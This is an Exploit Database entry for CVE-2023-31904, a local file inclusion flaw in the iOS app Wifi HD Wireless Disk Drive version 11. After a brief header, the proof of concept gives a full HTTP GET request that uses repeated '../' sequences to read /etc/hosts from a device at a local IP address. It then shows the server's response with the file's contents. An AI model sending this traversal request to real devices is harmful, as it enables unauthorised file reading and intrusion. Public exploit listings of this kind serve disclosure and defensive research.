Headline
CVE-2023-31904: OffSec’s Exploit Database Archive
savysoda Wifi HD Wireless Disk Drive 11 is vulnerable to Local File Inclusion.
# Exploit Title: Wifi HD Wireless Disk Drive 11 - Local File Inclusion
# Date: Aug 13, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: http://www.savysoda.com
# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976
# Version: 11
# Tested on: iPhone OS 15_5
# Proof of Concept
GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1
Host: 192.168.1.100
Connection: close
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)
AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1
Referer: http://192.168.1.103/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
-----------------
HTTP/1.1 200 OK
Content-Disposition: attachment
Content-Type: application/download
Content-Length: 213
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 03:33:30 GMT
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting. Do not change this entry.
##
127.0.0.1 localhost
255.255.255.255 broadcasthost
::1 localhost